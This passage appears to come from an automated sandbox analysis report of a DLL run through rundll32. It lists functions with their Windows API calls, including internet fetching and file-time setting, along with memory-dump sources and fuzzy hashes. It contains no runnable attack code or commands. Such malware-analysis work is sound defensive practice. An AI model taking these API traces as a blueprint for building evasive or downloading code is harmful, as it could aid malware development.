                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: CreateIconIndirect
                    • String ID:
                    • API String ID: 1936033138-0
                    • Opcode ID: 21b54dad7d89fbd7be9bb2151d1dae4690175a41df52678bf4325a9985cfa2dd
                    • Instruction ID: 07d1bf881de2e01eb6b83c30d5482067cb4da39630ef729873ef2b634f6fd1c7
                    • Opcode Fuzzy Hash: 21b54dad7d89fbd7be9bb2151d1dae4690175a41df52678bf4325a9985cfa2dd
                    • Instruction Fuzzy Hash: 36B10271A002099FCB10DFA8C9849DEBBF9FF49348B2189A5E814EB751D731AD46CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7C5F88 Relevance: 12.2, APIs: 8, Instructions: 221sleepCOMMON
                    Download Yara Rule
                    APIs
                    • Sleep.KERNEL32(00000000,?,00000000,?,6C7CF9B4,6C7E1FB8,?,?,6C7CF968,00000000,6C7CF98D,?,?,?,00000000), ref: 6C7C601E
                    • Sleep.KERNEL32(0000000A,00000000,?,00000000,?,6C7CF9B4,6C7E1FB8,?,?,6C7CF968,00000000,6C7CF98D,?,?,?,00000000), ref: 6C7C6038
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: eda14d31678e15c433b5dc57067b33e48b21882b23e24a4f842a87c284776c97
                    • Instruction ID: 4a11ff699402e1e4b79fbe227a1ba2f541035c54c3402bb1390fa3f6465090d2
                    • Opcode Fuzzy Hash: eda14d31678e15c433b5dc57067b33e48b21882b23e24a4f842a87c284776c97
                    • Instruction Fuzzy Hash: 627124713443028FE741CB29DAC8B6ABBE5AF86318F18827AD544CBBC1D7719984C753
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7C6180 Relevance: 10.9, APIs: 7, Instructions: 406COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 703d639cb2a32a2c6da4affd92b3c4ee3fb3ee417151c2d5d04341219375dfbc
                    • Instruction ID: f2c5e0198c3a1b731bd94b34d50d29ae6638226b3bc0050a8b946f17ed47c2a2
                    • Opcode Fuzzy Hash: 703d639cb2a32a2c6da4affd92b3c4ee3fb3ee417151c2d5d04341219375dfbc
                    • Instruction Fuzzy Hash: 2CC138627116020FE7048A7CEEC87AEB696DBC5325F58823DE214CBBC6DB75CA459343
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7C9A54 Relevance: 10.6, APIs: 7, Instructions: 130threadCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 6C7C9F14: GetCurrentThreadId.KERNEL32 ref: 6C7C9F17
                    • GetTickCount.KERNEL32 ref: 6C7C9A8B
                    • GetTickCount.KERNEL32 ref: 6C7C9AA3
                    • GetCurrentThreadId.KERNEL32 ref: 6C7C9AD2
                    • GetTickCount.KERNEL32 ref: 6C7C9AFD
                    • GetTickCount.KERNEL32 ref: 6C7C9B34
                    • GetTickCount.KERNEL32 ref: 6C7C9B5E
                    • GetCurrentThreadId.KERNEL32 ref: 6C7C9BCE
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: CountTick$CurrentThread
                    • String ID:
                    • API String ID: 3968769311-0
                    • Opcode ID: f72f4ba9399737d57ce720c2c029aba8bea3a9cdbdb9b69ea7c213746d95bec7
                    • Instruction ID: 20f7e26630e93b6fe0db7ba7fa2dec3b29f3c2915e1b466aa6237a4a76a7027a
                    • Opcode Fuzzy Hash: f72f4ba9399737d57ce720c2c029aba8bea3a9cdbdb9b69ea7c213746d95bec7
                    • Instruction Fuzzy Hash: A3416A31309347AED7919E78C68434EBAD1ABB135CF148A3CD4E887A85EB759484C753
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7CAB24 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40fileCOMMON
                    Download Yara Rule
                    APIs
                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,6C7CABDC,00000000,?,00000000,6C7CACF6,6C7CAD10,?,?,6C7D2490), ref: 6C7CAB5D
                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,6C7CABDC,00000000,?,00000000,6C7CACF6,6C7CAD10,?,?,6C7D2490), ref: 6C7CAB63
                    • GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,6C7CABDC,00000000,?,00000000), ref: 6C7CAB7E
                    • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,6C7CABDC,00000000,?), ref: 6C7CAB84
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: FileHandleWrite
                    • String ID: Error$Runtime error at 00000000
                    • API String ID: 3320372497-2970929446
                    • Opcode ID: bb66ea7f00c140ba9e2e3ed0481c52dd24381d18047ceabfabf366ff84e5c2be
                    • Instruction ID: 73e9d0f992444bfcd6228e0a25f0c6fb80bcfe4b46e7cded037478c2a0a34721
                    • Opcode Fuzzy Hash: bb66ea7f00c140ba9e2e3ed0481c52dd24381d18047ceabfabf366ff84e5c2be
                    • Instruction Fuzzy Hash: 47F0F65170424ABDFA009B644E4EF9A772C1762B2DF544615B330A8DD1C7A14488A323
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C8F9C04 Relevance: 9.1, APIs: 6, Instructions: 88COMMON
                    Download Yara Rule
                    APIs
                    • GetSystemMetrics.USER32(0000000B), ref: 6C8F9C5C
                    • GetSystemMetrics.USER32(0000000C), ref: 6C8F9C68
                    • GetDC.USER32(00000000), ref: 6C8F9C84
                    • GetDeviceCaps.GDI32(00000000,0000000E), ref: 6C8F9CAB
                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 6C8F9CB8
                    • ReleaseDC.USER32(00000000,00000000), ref: 6C8F9CF1
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: CapsDeviceMetricsSystem$Release
                    • String ID:
                    • API String ID: 447804332-0
                    • Opcode ID: ba610b215232a23ddf012c74d5d5ebc76487911ce677762d6f1277b240450a4b
                    • Instruction ID: 49ba815ec0455578e71595b229dbab3d1f6ce13ae5e479736c9d26958fa56883
                    • Opcode Fuzzy Hash: ba610b215232a23ddf012c74d5d5ebc76487911ce677762d6f1277b240450a4b
                    • Instruction Fuzzy Hash: 4B319174A00208EFDB11CFA9CA94ADEBBF5FF89354F118965E818EB754C730A941CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7C5C04 Relevance: 9.0, APIs: 7, Instructions: 298sleepCOMMON
                    Download Yara Rule
                    APIs
                    • Sleep.KERNEL32(00000000,?,6C7CF9D1,6C7E1FB8,?,?,6C7CF968,00000000,6C7CF98D,?,?,?,00000000,?,6C7CFCB6,00000000), ref: 6C7C5CBB
                    • Sleep.KERNEL32(0000000A,00000000,?,6C7CF9D1,6C7E1FB8,?,?,6C7CF968,00000000,6C7CF98D,?,?,?,00000000,?,6C7CFCB6), ref: 6C7C5CD1
                    • Sleep.KERNEL32(00000000,?,?,?,6C7CF9D1,6C7E1FB8,?,?,6C7CF968,00000000,6C7CF98D,?,?,?,00000000), ref: 6C7C5CFF
                    • Sleep.KERNEL32(0000000A,00000000,?,?,?,6C7CF9D1,6C7E1FB8,?,?,6C7CF968,00000000,6C7CF98D,?,?,?,00000000), ref: 6C7C5D15
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: c1709a7b4cadb47258954d6763112cf34fde56090073c7249d2452ad6ff26ca0
                    • Instruction ID: 3ad47697c7567809d0d2c5fc4ed53e3fdf55c7785e0609ed8d820f4237a0854e
                    • Opcode Fuzzy Hash: c1709a7b4cadb47258954d6763112cf34fde56090073c7249d2452ad6ff26ca0
                    • Instruction Fuzzy Hash: 03C163767053428FEB45CF29EAC435ABBF5AB82314F58827ED1148BBC1CBB19440DB82
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C901C0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 79comCOMMON
                    Download Yara Rule
                    APIs
                    • EnterCriticalSection.KERNEL32(6CD619D8,00000000,6C901D52,?,?), ref: 6C901C50
                    • CoCreateInstance.OLE32(6CD51FD8,00000000,00000005,6C901D7C,00000000,00000000,6C901D03,?,6CD619D8,00000000,6C901D52,?,?), ref: 6C901C86
                    • LeaveCriticalSection.KERNEL32(6CD619D8,6C901D0A,6C901D52,?,?), ref: 6C901CFB
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: CriticalSection$CreateEnterInstanceLeave
                    • String ID: (%X)$CLSID_WICImagingFactory
                    • API String ID: 2599307331-3070663610
                    • Opcode ID: 0031fdc9b02c41891cdcdd9451ff1dbd1ec0954a8920e766657eeebcdfe6d0ac
                    • Instruction ID: 2fc728479142871b5b368a615910d2a6f99c067bb036c2c169d81404caaf036c
                    • Opcode Fuzzy Hash: 0031fdc9b02c41891cdcdd9451ff1dbd1ec0954a8920e766657eeebcdfe6d0ac
                    • Instruction Fuzzy Hash: C7219470B04605AFDB01CBA9C945BEABBF8EB4A31CF414869E910E7F50D735D904CB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C8DF81C Relevance: 7.6, APIs: 5, Instructions: 133filetimeCOMMON
                    Download Yara Rule
                    APIs
                    • SetLastError.KERNEL32(00000000,00000000,6C8DF959,?,00000000,6C8DF9BD), ref: 6C8DF8F5
                    • CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000003,00000080,00000000,00000000,00000000,6C8DF959,?,00000000,6C8DF9BD), ref: 6C8DF92C
                    • SetFileTime.KERNEL32(000000FF,00000000,?,?,00000000,40000000,00000002,00000000,00000003,00000080,00000000,00000000,00000000,6C8DF959,?,00000000), ref: 6C8DF94A
                    • CloseHandle.KERNEL32(000000FF,6C8DF9C4,00000000,00000000,00000000,6C8DF959,?,00000000,6C8DF9BD), ref: 6C8DF996
                    • SetLastError.KERNEL32(00000000,000000FF,6C8DF9C4,00000000,00000000,00000000,6C8DF959,?,00000000,6C8DF9BD), ref: 6C8DF99D
                      • Part of subcall function 6C8DEF1C: TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,6C8DF959,?,?,?,?,?,?,?,?,?), ref: 6C8DEF64
                      • Part of subcall function 6C8DEF1C: SystemTimeToFileTime.KERNEL32(6C8DF959,?,?,?,?,?,?,?,?,?,?), ref: 6C8DEF7C
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: Time$File$ErrorLastSystem$CloseCreateHandleLocalSpecific
                    • String ID:
                    • API String ID: 1347700184-0
                    • Opcode ID: 55e2bed3da37d1db740f77d95cb68b2bbfff43670b34887c6438c68f31b63fe7
                    • Instruction ID: e673f31821efba8ef652658724f0556d339b5fe8000cd65458ea05a2cb935753
                    • Opcode Fuzzy Hash: 55e2bed3da37d1db740f77d95cb68b2bbfff43670b34887c6438c68f31b63fe7
                    • Instruction Fuzzy Hash: 52415D75E0020AAFDB11CFA8CE44B9EBBB5EF49314F128865E914EB790D734A904DB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C9DB4D4 Relevance: 7.6, APIs: 5, Instructions: 83networkfileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 6C9BE454: GetWindowTextW.USER32(?,?,00000100), ref: 6C9BE483
                    • InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 6C9DB523
                    • InternetOpenUrlW.WININET(?,00000000,00000000,00000000,00000000,00000000), ref: 6C9DB540
                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 6C9DB58A
                    • InternetCloseHandle.WININET(00000000), ref: 6C9DB5C8
                    • InternetCloseHandle.WININET(?), ref: 6C9DB5D1
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2946793531.000000006C7C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947205162.000000006CD4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947228750.000000006CD4F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947255732.000000006CD50000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947279452.000000006CD53000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947306603.000000006CD56000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947331721.000000006CD59000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947353509.000000006CD5B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947373410.000000006CD60000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947396143.000000006CD65000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947440734.000000006CD67000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD68000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 0000000B.00000002.2947521793.000000006CD6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_6c7c0000_rundll32.jbxd
                    Similarity
                    • API ID: Internet$CloseHandleOpen$FileReadTextWindow
                    • String ID:
                    • API String ID: 329204902-0
                    • Opcode ID: 69c8b81ab40e80926345e286fd47249d90011a70c193658afeecc4755bf920d7
                    • Instruction ID: 8bc03c334d822c5a623dbf76c730db40ef36de23a4530574d5a1ba920ad03e7c
                    • Opcode Fuzzy Hash: 69c8b81ab40e80926345e286fd47249d90011a70c193658afeecc4755bf920d7
                    • Instruction Fuzzy Hash: BC313270A00609AFDB10DBA4CD49FDEB7B9AF44308F1149A5E504F7690DB71BA88CB56
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6C7E8C60 Relevance: 7.6, APIs: 5, Instructions: 63COMMON
                    Download Yara Rule
                    APIs
                    • GetFileAttributesW.KERNEL32(00000000,?,?,00000000,6C7E8A82), ref: 6C7E8C71
                    • GetLastError.KERNEL32(00000000,?,?,00000000,6C7E8A82), ref: 6C7E8CCA
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2946793531.000000006C7DE000.00000020.00000001.01000000.00000003.sdmp, Offset: 6C7C0000, based on PE: true
                    • Associated: 0000000B.00000002.2946773557.000000006C7C0000.00000002.00000001.01000000.00000003.sdmpDownload File
